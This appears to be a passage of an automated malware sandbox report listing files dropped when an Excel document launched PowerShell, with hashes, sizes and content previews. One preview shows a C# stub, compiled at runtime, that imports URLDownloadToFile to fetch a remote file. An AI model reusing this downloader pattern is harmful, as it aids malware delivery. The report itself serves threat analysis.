                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                    File Type:MSVC .res
                                                                                                    Category:dropped
                                                                                                    Size (bytes):652
                                                                                                    Entropy (8bit):3.095976329132984
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grypYak7YnqqYNPN5Dlq5J:+RI+ycuZhNkakSgPNnqX
                                                                                                    MD5:86E8D11B95226D0FB63AD3B32E013148
                                                                                                    SHA1:358B6F6D32B2F447201D8B192E9C00E0E95558D1
                                                                                                    SHA-256:EDB03287D9CC854BF320D7A7427A45F07E7892E1D55995876CDD94AAA78B390F
                                                                                                    SHA-512:1462F57E74DA84AE4BE2803A690B14196937FD7BDFC1D789ED957EFE7FA915D89395A6C2DADD56C8E2526BE1C0AAD3192D59F642562C7E19B5A6002177EF01D0
                                                                                                    Malicious:false
                                                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.n.x.b.d.a.c.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...1.n.x.b.d.a.c.o...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                    C:\Users\user\AppData\Local\Temp\3z0m5mz2.zzr.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview:1

                                                                                                    C:\Users\user\AppData\Local\Temp\50wbtg3o.2ye.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview:1

                                                                                                    C:\Users\user\AppData\Local\Temp\RES2BF1.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Oct 29 09:12:56 2024, 1st section name ".debug$S"
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1328
                                                                                                    Entropy (8bit):3.9923800048536946
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Hke9E2U3x7ndH3IwKdNWI+ycuZhNIEakSJJPNnqSqd:E3xZHKd41ulIEa3JrqSK
                                                                                                    MD5:6974420558B346FFD682202BCD6D3E92
                                                                                                    SHA1:D3843F039766430BDF82F7E6659BBC9C646E16F1
                                                                                                    SHA-256:E8F6EFB5CED1F4D876C21B56B2EAE535C239AE20D34E78C6035A11C2C99703DF
                                                                                                    SHA-512:243570FBF39BE847C956837CFEEC6B04D1267EA2E8FD77F004326F9BA547F65543F2ACAC863AE4DE84B96EE05338C344ADED8FC9EED0B4535D8FC1383979B12E
                                                                                                    Malicious:false
                                                                                                    Preview:L..... g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\vbdaauwq\CSC29236E271A724343A6FBC96F9241CBFB.TMP...............T....$..F..Cqm_..........4.......C:\Users\user\AppData\Local\Temp\RES2BF1.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.b.d.a.a.u.w.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                                                    C:\Users\user\AppData\Local\Temp\RESE550.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Oct 29 09:12:38 2024, 1st section name ".debug$S"
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1328
                                                                                                    Entropy (8bit):3.9783335869661434
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Hqe9E2UytdHOwKdNWI+ycuZhNkakSgPNnqSqd:qy7NKd41ulka34qSK
                                                                                                    MD5:99593D4AD899C3F44BDE5CC1A50B1C94
                                                                                                    SHA1:5A8B33B3E8924ED6B43FFD4F82A13419E3EB59CC
                                                                                                    SHA-256:EBD70E15F79B26DF9AAEBA8E9EBD5D5C2FB39629774B2ECC03A23BF3CD2B7935
                                                                                                    SHA-512:85D5FF4C9E5EAF755E20D1A228D609EB756A1217C95483951CB99C8EF91B21FF698592E2FC463059EE889CA0CE95D62B16F2F14475A013AA6EC82D53C69D4E2A
                                                                                                    Malicious:false
                                                                                                    Preview:L..... g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\1nxbdaco\CSCDA0B5C0F54B64E9AA66FC6FE2D4D8162.TMP...................."m..:...1H..........4.......C:\Users\user\AppData\Local\Temp\RESE550.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.n.x.b.d.a.c.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                                                    C:\Users\user\AppData\Local\Temp\ec1a3ghk.aca.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview:1

                                                                                                    C:\Users\user\AppData\Local\Temp\erafrdun.wdh.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview:1

                                                                                                    C:\Users\user\AppData\Local\Temp\gf0dux01.xav.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview:1

                                                                                                    C:\Users\user\AppData\Local\Temp\iolk5cex.b13.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview:1

                                                                                                    C:\Users\user\AppData\Local\Temp\iq12hdjy.our.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Unknown
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview:1

                                                                                                    C:\Users\user\AppData\Local\Temp\pxbqh0zh.pjx.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview:1

                                                                                                    C:\Users\user\AppData\Local\Temp\q4yillfe.2xt.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview:1

                                                                                                    C:\Users\user\AppData\Local\Temp\st20jxkz.eba.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview:1

                                                                                                    C:\Users\user\AppData\Local\Temp\tmtizfhy.lvm.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview:1

                                                                                                    C:\Users\user\AppData\Local\Temp\vbdaauwq\CSC29236E271A724343A6FBC96F9241CBFB.TMP

                                                                                                    Download File
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                    File Type:MSVC .res
                                                                                                    Category:dropped
                                                                                                    Size (bytes):652
                                                                                                    Entropy (8bit):3.1104961279495162
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grySIRak7YnqqJIWPN5Dlq5J:+RI+ycuZhNIEakSJJPNnqX
                                                                                                    MD5:54961682E883248BB846D6C743716D5F
                                                                                                    SHA1:A94C9489662E7703C90127387BDB5D7474C4A7A5
                                                                                                    SHA-256:5FC9C86F3DF31464472751C6E0FD60E1B8B8CE83075645957EE261637D494E21
                                                                                                    SHA-512:30C7640D18700F14EAA9535D22F208EF719744501E79E6BE1147CD6A6176B7D309CDBE366B7E0225C7E379CE052F8ACAF97557F858C608BA2937D95360218705
                                                                                                    Malicious:false
                                                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.b.d.a.a.u.w.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...v.b.d.a.a.u.w.q...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                    C:\Users\user\AppData\Local\Temp\vbdaauwq\vbdaauwq.0.cs

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (343)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):462
                                                                                                    Entropy (8bit):3.939691802887259
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:V/DsYLDS81zu0k9dl5mM+TQXReKJ8SRHy4HmukGrkQKRF/kbsLiwHQy:V/DTLDfuldl5bXfHitGtKEsLiwHQy
                                                                                                    MD5:BF57B8E732D7B6222960BF1D5DD5DF18
                                                                                                    SHA1:0CDA321126A9876C2881199B2940C05492B0D94F
                                                                                                    SHA-256:F77463E3272AF620BC1620C10233F07A3E1C43B77D053A3477A92579B912CCFC
                                                                                                    SHA-512:9ED1F51736815946772533E380020B0DE4C449AAA72DB6B2CE29D7EAB458216DD8FA9B9333A07164C72290D758412DCBAB51099DA031ED465EE62F73A14CFABB
                                                                                                    Malicious:false
                                                                                                    Preview:.using System;.using System.Runtime.InteropServices;..namespace HUVx.{. public class knXlEwKrnwQ. {. [DllImport("uRLMoN.DlL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr Nbxm,string LmAkPDnea,string bfnYdb,uint zsWSAW,IntPtr AXG);.. }..}.

                                                                                                    C:\Users\user\AppData\Local\Temp\vbdaauwq\vbdaauwq.cmdline

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):369
                                                                                                    Entropy (8bit):5.235032249451187
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fvU1UVUzxs7+AEszIP23fvU1UP:p37Lvkmb6Kz3CVWZEo3CQ
                                                                                                    MD5:B83A00A6EEAC3A02923F306258A7AE13
                                                                                                    SHA1:F2952CB8D814B4C0B5AB6074B917DA88B897692D
                                                                                                    SHA-256:65B8439CD40D613A017F14F1E33821174E6D79A0FD6F8741F413C9BA3B0BA436
                                                                                                    SHA-512:836D1F5C11B1AB3EDC5D67519F9F7D3159E59BD6E09C0891CD7A9E2C05F890F5A9CC04263454B99B201192E7FA36A1A627004E90483FB4B1164C5451FDB2C610
                                                                                                    Malicious:false
                                                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\vbdaauwq\vbdaauwq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vbdaauwq\vbdaauwq.0.cs"

                                                                                                    C:\Users\user\AppData\Local\Temp\vbdaauwq\vbdaauwq.dll

                                                                                                    Download File
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3072
                                                                                                    Entropy (8bit):2.836527922689339
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:61skr+41VgkCJCnm2MbCZX1ulIEa3Jrq:ai4fgwJebK
                                                                                                    MD5:8785B7FD0A80CDB566C7A6F6D25E3456
                                                                                                    SHA1:9FB8538A9286A3426BAE29B12BAD4352169E1328
                                                                                                    SHA-256:063DD6C2BD713EDF692B0B7E21E57E44D8EE60A2D03A8C036D7C7D512543458D
                                                                                                    SHA-512:6112A7E73A5D75C9D16EB11FCD392ED08F36377947B4BDAE368C877AE362103E635F20C05CCD2D69C225A193C46FC669B722748FB5C45934CEB6EC35862EC9BA
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... g...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................8.1.....x.....x...........................#.............. ?.....P ......Q.........W.....\.....f.....m.....t...Q.....Q...!.Q.....Q.......!.....*.......?.......................................(..........<Module>.vb

                                                                                                    C:\Users\user\AppData\Local\Temp\vbdaauwq\vbdaauwq.out

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                    Category:modified
                                                                                                    Size (bytes):866
                                                                                                    Entropy (8bit):5.3450593407414395
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:AId3ka6Kz3C6Eo3CFKaMD5DqBVKVrdFAMBJTH:Akka603C6Eo3CFKdDcVKdBJj
                                                                                                    MD5:00D809C6873B68FDBC7C5DF3D6A2E9BB
                                                                                                    SHA1:BE1352A2CD71C671BA1CEA15646251392DBA0BC5
                                                                                                    SHA-256:1F3ECAB48712079E6412F3BEBE2DDBEAE8A06C4CA3FC41AF1BDB7F11618B67DB
                                                                                                    SHA-512:9440B5C176A19D7605520EDB30AA0348051CB771A3D3E8C75676C37C1873F8DF1AABF6425CE40488B308DF8453D77D33CACABDD58D2DA61D83FC54E0E299164C
                                                                                                    Malicious:false
                                                                                                    Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\vbdaauwq\vbdaauwq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vbdaauwq\vbdaauwq.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                    C:\Users\user\AppData\Local\Temp\wqaotrly.rtk.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Unknown
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview:1

                                                                                                    C:\Users\user\AppData\Local\Temp\ycbfwx3a.s4z.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview:1

                                                                                                    C:\Users\user\AppData\Local\Temp\~DF0407BBAADC72E6ED.TMP

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):512
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3::
                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                    Malicious:false
                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Temp\~DF06DFB6BF6A83F547.TMP

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):512
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3::
                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                    Malicious:false
                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Temp\~DFC7AD5FC8DD1E6E01.TMP

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):512
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3::
                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                    Malicious:false
                                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

